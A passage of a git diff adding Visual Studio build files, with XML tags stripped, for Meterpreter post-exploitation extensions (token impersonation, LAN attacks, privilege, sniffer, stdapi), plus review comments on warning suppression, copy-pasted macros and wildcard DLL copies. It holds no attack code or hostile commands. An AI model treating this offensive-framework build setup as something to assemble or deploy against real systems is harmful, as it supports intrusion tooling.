+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX86
+
+
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ false
+ ..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ backcompat.lib;Netapi32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)
+ .\Release/ext_server_incognito.dll
+ ..\backcompat\Release;..\metsrv\Release;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_incognito.map
+ Windows
+
+
+
+
+ false
+
+
+ .\Release/ext_server_incognito.lib
+ MachineX86
+ false
+ 5.0
+
+
+ copy /y "$(ProjectDir)\release\ext_server_incognito.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX64
+
+
+
+
+ X64
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ false
+ ..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ Netapi32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)
+ .\Release\ext_server_incognito.x64.dll
+ ..\metsrv\Release;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_incognito.map
+ NotSet
+
+
+
+
+ false
+
+
+ .\Release/ext_server_incognito.lib
+ MachineX64
+ false
+
+
+
+
+ copy /y "$(ProjectDir)\release\ext_server_incognito.x64.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+ {37e24f8f-1bd9-490b-8cd2-4768b89e5eab}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj b/external/source/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj
new file mode 100644
index 0000000000..f8f55426c4
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj
@@ -0,0 +1,256 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}
+ ext_server_lanattacks
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ true
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ .\Release\
+ .\Release\
+ false
+ false
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX86
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX64
+
+
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ false
+ ..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ backcompat.lib;Netapi32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)
+ .\Release/ext_server_lanattacks.dll
+ ..\backcompat\Release;..\metsrv\Release;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_lanattacks.map
+ Windows
+
+
+
+
+ false
+
+
+ .\Release/ext_server_lanattacks.lib
+ MachineX86
+ false
+ 5.0
+
+
+ copy /y "$(ProjectDir)\release\ext_server_lanattacks.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ X64
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ false
+ ..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ Netapi32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)
+ .\Release\ext_server_lanattacks.x64.dll
+ ..\metsrv\Release;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_lanattacks.map
+ NotSet
+
+
+
+
+ false
+
+
+ .\Release/ext_server_lanattacks.lib
+ MachineX64
+ false
+
+
+
+
+ copy /y "$(ProjectDir)\release\ext_server_lanattacks.x64.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+ {37e24f8f-1bd9-490b-8cd2-4768b89e5eab}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj b/external/source/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj
new file mode 100644
index 0000000000..86e77ecce6
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj
@@ -0,0 +1,380 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {87C64204-C82F-415D-AF45-D0B33BDFE39A}
+ ext_server_priv
+
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ .\Release\
+ .\Release\
+ false
+ false
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ .\Debug\
+ .\Debug\
+ true
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ Win32
+ .\Release/ext_server_priv.tlb
+
+
+
+
+ MinSpace
+ OnlyExplicitInline
+ ..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Create
+ precomp.h
+ .\Release/ext_server_priv.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ backcompat.lib;psapi.lib;odbc32.lib;odbccp32.lib;metsrv.lib;%(AdditionalDependencies)
+ .\Release/ext_server_priv.dll
+ true
+ ..\backcompat\Release;..\metsrv\Release;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ .\Release/ext_server_priv.pdb
+ false
+
+
+ .\Release/ext_server_priv.lib
+ MachineX86
+ 5.0
+ Windows
+
+
+ true
+ .\Release/ext_server_priv.bsc
+
+
+ copy /y "$(ProjectDir)\release\ext_server_priv.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ X64
+ .\Release/ext_server_priv.tlb
+
+
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ ..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Create
+ precomp.h
+ .\Release/ext_server_priv.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ psapi.lib;odbc32.lib;odbccp32.lib;metsrv.lib;%(AdditionalDependencies)
+ .\Release\ext_server_priv.x64.dll
+ true
+ ..\metsrv\Release;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ .\Release/ext_server_priv.pdb
+ false
+
+
+ .\Release/ext_server_priv.lib
+ MachineX64
+
+
+
+
+ true
+ .\Release/ext_server_priv.bsc
+
+
+ copy /y "$(ProjectDir)\release\ext_server_priv.x64.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ Win32
+ .\Debug/ext_server_priv.tlb
+
+
+
+
+ Disabled
+ ..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+ Use
+ precomp.h
+ .\Debug/ext_server_priv.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ EditAndContinue
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ psapi.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Debug/ext_server_priv.dll
+ true
+ true
+ .\Debug/ext_server_priv.pdb
+ false
+
+
+ .\Debug/ext_server_priv.lib
+ MachineX86
+
+
+ true
+ .\Debug/ext_server_priv.bsc
+
+
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ X64
+ .\Debug/ext_server_priv.tlb
+
+
+
+
+ Disabled
+ ..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+ Use
+ precomp.h
+ .\Debug/ext_server_priv.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ ProgramDatabase
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ psapi.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Debug/ext_server_priv.dll
+ true
+ true
+ .\Debug/ext_server_priv.pdb
+ false
+
+
+ .\Debug/ext_server_priv.lib
+ MachineX64
+
+
+ true
+ .\Debug/ext_server_priv.bsc
+
+
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+
+
+
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+ {662afbb3-f64a-4ad1-8956-b9f1b846231c}
+ false
+
+
+ {37e24f8f-1bd9-490b-8cd2-4768b89e5eab}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
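Review bot: The Release preprocessor definitions in both platform blocks add `_CRT_SECURE_NO_WARNINGS`, which silences the compiler's C4996 deprecation warnings for unbounded CRT calls such as `strcpy` and `sprintf` across the whole project. Those warnings are a cheap review signal at warning level 3; prefer dropping the define, so the value reads `WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;%(PreprocessorDefinitions)`, and suppressing at the individual call sites that have been checked, with `#pragma warning(suppress: 4996)`. The Debug blocks here do not set the define, so Debug and Release builds also differ in which diagnostics they show. The Win32 Release block of ext_server_sniffer and both Release blocks of ext_server_stdapi carry the same define.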
diff --git a/external/source/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj b/external/source/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj
new file mode 100644
index 0000000000..7094f521af
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj
@@ -0,0 +1,263 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}
+ ext_server_incognito
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ true
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ .\Release\
+ .\Release\
+ false
+ false
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX86
+
+
+
+
+ X64
+
+
+ Disabled
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX64
+
+
+
+
+ MinSpace
+ OnlyExplicitInline
+ false
+ Neither
+ ..\..\source\extensions\sniffer;..\..\source\openssl\include;..\..\source\pssdk\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;_CRT_SECURE_NO_WARNINGS;EXT_SERVER_SNIFFER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Create
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ Default
+ false
+ precomp.h
+ .\Release/ext_server_sniffer.pch
+
+
+ backcompat.lib;metsrv.lib;pssdk.lib;ws2_32.lib;%(AdditionalDependencies)
+ .\Release/ext_server_sniffer.dll
+ ..\backcompat\Release;..\metsrv\Release;..\..\source\openssl\lib\win;..\..\source\pssdk\win32;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ false
+
+
+ Windows
+
+
+
+
+ false
+
+
+ .\Release/ext_server_sniffer.lib
+ MachineX86
+ false
+ 5.0
+ false
+
+
+ copy /y "$(ProjectDir)\release\*.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ X64
+
+
+ MinSpace
+ Default
+ false
+ Size
+ ..\..\source\extensions\sniffer;..\..\source\openssl\include;..\..\source\pssdk\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SNIFFER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Create
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+ precomp.h
+ .\Release/ext_server_sniffer.pch
+
+
+ metsrv.lib;pssdk.lib;kernel32.lib;ws2_32.lib;%(AdditionalDependencies)
+ .\Release/ext_server_sniffer.x64.dll
+ ..\metsrv\Release;..\..\source\openssl\lib\win;..\..\source\pssdk\win64;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_sniffer.map
+ Windows
+
+
+
+
+ false
+
+
+ .\Release/ext_server_sniffer.lib
+ MachineX64
+ false
+
+
+ false
+
+
+ copy /y "$(ProjectDir)\release\*.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+ {37e24f8f-1bd9-490b-8cd2-4768b89e5eab}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
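Review bot: This project still carries identifiers copied from ext_server_incognito: the name value in the globals block is `ext_server_incognito`, and both Debug blocks define `EXT_SERVER_INCOGNITO_EXPORTS` while the Release blocks define `EXT_SERVER_SNIFFER_EXPORTS`. If the sources key their export declarations on the sniffer macro, Debug builds compile them differently from Release; the name should read `ext_server_sniffer` and the Debug definitions `WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SNIFFER_EXPORTS;%(PreprocessorDefinitions)`. Separately, both post-build steps run `copy /y "$(ProjectDir)\release\*.dll"`, which copies every DLL in that directory, not only the artifact just built. Naming the file, as the other extension projects do, keeps stale or unrelated binaries out of `output`.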
diff --git a/external/source/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj b/external/source/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj
new file mode 100644
index 0000000000..28e0d57930
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj
@@ -0,0 +1,636 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}
+ ext_server_stdapi
+
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ .\Debug\
+ .\Debug\
+ true
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ .\Release\
+ .\Release\
+ false
+ false
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ Win32
+ .\Debug/ext_server_stdapi.tlb
+
+
+
+
+ Disabled
+ ..\..\source\extensions\stdapi\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+ Use
+ precomp.h
+ .\Debug/ext_server_stdapi.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ EditAndContinue
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ iphlpapi.lib;shlwapi.lib;ws2_32.lib;metsrv.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Debug/ext_server_stdapi.dll
+ true
+ ..\metsrv\Debug;%(AdditionalLibraryDirectories)
+ true
+ .\Debug/ext_server_stdapi.pdb
+ false
+
+
+ .\Debug/ext_server_stdapi.lib
+ MachineX86
+
+
+ true
+ .\Debug/ext_server_stdapi.bsc
+
+
+ copy debug\ext_server_stdapi.dll ..\..\output\extensions
+
+
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ X64
+ .\Debug/ext_server_stdapi.tlb
+
+
+
+
+ Disabled
+ ..\..\source\extensions\stdapi\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+ Use
+ precomp.h
+ .\Debug/ext_server_stdapi.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ ProgramDatabase
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ iphlpapi.lib;shlwapi.lib;ws2_32.lib;metsrv.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Debug/ext_server_stdapi.dll
+ true
+ ..\metsrv\Debug;%(AdditionalLibraryDirectories)
+ true
+ .\Debug/ext_server_stdapi.pdb
+ false
+
+
+ .\Debug/ext_server_stdapi.lib
+ MachineX64
+
+
+ true
+ .\Debug/ext_server_stdapi.bsc
+
+
+ copy debug\ext_server_stdapi.dll ..\..\output\extensions
+
+
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ Win32
+ .\Release/ext_server_stdapi.tlb
+
+
+
+
+ MinSpace
+ OnlyExplicitInline
+ ..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;_CRT_SECURE_NO_WARNINGS;CINTERFACE;COBJMACROS;%(PreprocessorDefinitions)
+ false
+ MultiThreaded
+ false
+ Create
+ precomp.h
+ .\Release/ext_server_stdapi.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ backcompat.lib;iphlpapi.lib;shlwapi.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;metsrv.lib;jpeg.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)
+ .\Release\ext_server_stdapi.dll
+ true
+ ..\backcompat\Release;..\metsrv\Release;..\..\source\openssl\lib\win;..\..\source\jpeg-8\lib\win\x86;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ true
+ .\Release/ext_server_stdapi.map
+ false
+
+
+ .\Release/ext_server_stdapi.lib
+ MachineX86
+ 5.0
+ Windows
+
+
+ true
+ .\Release/ext_server_stdapi.bsc
+
+
+ copy /y "$(ProjectDir)\release\ext_server_stdapi.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ X64
+ .\Release/ext_server_stdapi.tlb
+
+
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ ..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;_CRT_SECURE_NO_WARNINGS;CINTERFACE;COBJMACROS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Create
+ precomp.h
+ .\Release/ext_server_stdapi.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ iphlpapi.lib;shlwapi.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;metsrv.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)
+ .\Release\ext_server_stdapi.x64.dll
+ true
+ ..\..\source\jpeg-8\lib\win\x64;..\metsrv\Release;..\..\source\openssl\lib\win\x64;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ true
+ .\Release/ext_server_stdapi.map
+ false
+
+
+ .\Release/ext_server_stdapi.lib
+ MachineX64
+
+
+
+
+ true
+ .\Release/ext_server_stdapi.bsc
+
+
+ copy /y "$(ProjectDir)\release\*.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ Create
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
